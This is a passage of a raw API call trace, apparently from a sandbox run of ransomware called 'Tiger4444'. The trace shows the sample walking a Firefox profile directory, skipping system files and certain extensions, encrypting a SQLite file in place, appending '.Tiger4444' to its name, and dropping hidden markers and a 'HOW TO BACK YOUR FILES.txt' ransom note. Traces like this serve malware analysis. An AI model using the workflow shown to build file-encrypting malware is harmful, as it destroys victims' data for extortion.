[0051.373] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.373] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.373] CloseHandle (hObject=0x260) returned 1 [0051.373] CloseHandle (hObject=0x2ac) returned 1 [0051.373] GetCurrentThreadId () returned 0xfa8 [0051.373] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc86ba8 [0051.373] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb" [0051.374] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77fc0 | out: hHeap=0xc50000) returned 1 [0051.374] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86ba0 | out: hHeap=0xc50000) returned 1 [0051.374] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb" [0051.374] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\" [0051.374] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.BFC0E91B00AE8A0620D3" [0051.374] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.383] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.385] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.386] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.386] CloseHandle (hObject=0x2ac) returned 1 [0051.387] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb") returned 102 [0051.387] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.387] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xeffbe54, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83a3c640, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0051.387] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.387] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.387] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.387] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.387] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xeffbe54, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83a3c640, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.387] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.387] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.387] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.387] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.387] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.387] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83a3c640, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83a3c640, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83a627b7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.387] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.387] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.387] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e680c0, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2e680c0, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x2e680c0, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2918063365piupsah.files", cAlternateFileName="291806~1.FIL")) returned 1 [0051.387] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="Tiger4444.exe") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2=".") returned 1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="..") returned 1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="windows") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="bootmgr") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="pagefile.sys") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="boot") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="ids.txt") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="NTUSER.DAT") returned -1 [0051.388] lstrcpyW (in: lpString1=0x30aeb76, lpString2="2918063365piupsah.files" | out: lpString1="2918063365piupsah.files") returned="2918063365piupsah.files" [0051.388] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc86900 [0051.388] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xfe) returned 0xc81d40 [0051.388] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc86908 | out: ListHead=0xc66828, ListEntry=0xc86908) returned 0xc5a728 [0051.388] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4714894, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0xc000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2918063365piupsah.sqlite", cAlternateFileName="291806~1.SQL")) returned 1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="Tiger4444.exe") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2=".") returned 1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="..") returned 1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="windows") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="bootmgr") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="pagefile.sys") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="boot") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="ids.txt") returned -1 [0051.388] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="NTUSER.DAT") returned -1 [0051.388] lstrcpyW (in: lpString1=0x30aeb76, lpString2="2918063365piupsah.sqlite" | out: lpString1="2918063365piupsah.sqlite") returned="2918063365piupsah.sqlite" [0051.388] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite", dwFileAttributes=0x0) returned 1 [0051.389] lstrlenW (lpString="2918063365piupsah.sqlite") returned 24 [0051.389] lstrlenW (lpString="Tiger4444") returned 9 [0051.389] lstrcmpiW (lpString1="ah.sqlite", lpString2="Tiger4444") returned -1 [0051.389] lstrlenW (lpString=".dll") returned 4 [0051.389] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.389] lstrlenW (lpString=".lnk") returned 4 [0051.389] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.389] lstrlenW (lpString=".ini") returned 4 [0051.389] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.389] lstrlenW (lpString=".sys") returned 4 [0051.389] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.389] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.389] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.389] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14284254391) returned 1 [0051.389] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=49152) returned 1 [0051.390] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0051.390] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0051.390] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc300, lpName=0x0) returned 0x2c8 [0051.391] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc300) returned 0xbe0000 [0051.420] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81e48 [0051.420] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0051.420] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81e48 | out: hHeap=0xc50000) returned 1 [0051.420] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0051.420] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.421] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0051.421] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.421] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0051.421] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14287382420) returned 1 [0051.421] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0051.421] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0051.421] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.421] CloseHandle (hObject=0x2c8) returned 1 [0051.421] CloseHandle (hObject=0x260) returned 1 [0051.421] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.Tiger4444") returned 137 [0051.421] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0051.422] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4714894, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0xc000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2918063365piupsah.sqlite", cAlternateFileName="291806~1.SQL")) returned 0 [0051.422] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0051.422] lstrcpyW (in: lpString1=0x30aeb76, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.422] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.422] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.422] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.424] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.424] CloseHandle (hObject=0x260) returned 1 [0051.424] CloseHandle (hObject=0x2ac) returned 1 [0051.424] GetCurrentThreadId () returned 0xfa8 [0051.424] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc86908 [0051.424] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0051.424] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.424] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86900 | out: hHeap=0xc50000) returned 1 [0051.424] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0051.424] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\" [0051.424] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.BFC0E91B00AE8A0620D3" [0051.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.425] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.427] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.428] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.428] CloseHandle (hObject=0x2ac) returned 1 [0051.429] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned 126 [0051.429] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.429] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e680c0, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2e680c0, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83aaec21, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.429] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.429] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.429] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.429] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.429] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e680c0, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2e680c0, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83aaec21, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.429] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.429] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.429] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.429] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.429] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.429] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83aaec21, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83aaec21, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83aaec21, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.429] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.429] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.430] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83aaec21, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83aaec21, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83aaec21, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.430] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.430] lstrcpyW (in: lpString1=0x30aeba6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.430] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.430] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.430] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.431] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.431] CloseHandle (hObject=0x260) returned 1 [0051.431] CloseHandle (hObject=0x2ac) returned 1 [0051.431] GetCurrentThreadId () returned 0xfa8 [0051.431] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc5a728 [0051.431] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups") 